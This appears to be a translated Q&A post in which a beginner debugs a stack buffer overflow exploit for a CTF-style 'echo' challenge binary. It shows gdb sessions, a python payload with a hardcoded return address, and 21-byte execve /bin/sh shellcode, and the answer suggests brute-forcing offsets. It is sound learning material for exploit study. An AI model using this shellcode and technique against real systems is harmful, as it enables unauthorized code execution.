C简单缓冲区溢出

Question

我正在尝试了解缓冲区溢出如何工作以及如何使用它。 我通过尝试利用提供的二进制文件来解决一个简单的挑战（后门实验室回声挑战）。

（请参阅： http : //hack.bckdr.in/ECHO/echo ）

我认为我所做的一切都正确（根据我一直在阅读的指南和教程），但仍然无法正常工作，现在已经使我疯狂了几个小时。

bufferoverflow让我重写了下一条指令（eip）。

(gdb) run <<< $(python -c 'print "A"*62+"BBBB"')    

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

因此，我能够覆盖下一个eip，现在让我们添加一些21字节的shell代码，该代码会生成一个shell并尝试查找它所在的地址。

(gdb) run <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/100x $sp
0xbffff750:     0xe1f7c931      0x2f2f6851      0x2f686873      0x896e6962
0xbffff760:     0xcd0bb0e3      0xbfff0080      0xbffff80c      0xb7fff3d0
0xbffff770:     0x08048480      0xffffffff      0x0012efc4      0x080482d8
0xbffff780:     0x00000001      0xbffff7c0      0x0011eb25      0x0012fab0

宾果游戏的shellcode就在这里加载在0xbffff750上，所以这就是我们要向eip寻址的地址。

到目前为止，一切对我来说都很合适，因此我尝试使用找到的正确值进行尝试。

(gdb) run <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0xbffff750 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.192.el6.i686
(gdb)


(gdb) x/i $eip
=> 0xbffff750:  xor    %ecx,%ecx
(gdb)

eip更改为正确的地址，并且shellcode设置到位，但是，当我在shell中尝试使用它时，它无法正常工作，并且仍然会出现段错误，如您所见。

[rick@TESTBOX tmp]$ ./vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀
Segmentation fault
[rick@TESTBOX tmp]$

这里有人对此有任何想法，看到错误或有其他想法吗？ 如前所述，我是一个尝试理解基本原理的新手，显然我在做错什么。

Answer 1

我认为您的问题是：

程序的实际执行与gdb控制的程序之间存在差异。

你需要

1. 预测这种差异。 这个问题举了一个例子。

要么

2. 我还几个月前面对了您的问题。 当时，我观察到了这种差异。 但是我没有使用这种方法来找到差异，而是使用了《剥削的艺术》 0x331中的蛮力方式：使用shell脚本尝试不同的偏移量。

这个问题将来可能会对您有所帮助，它告诉您如何关闭某些安全功能以进行攻击。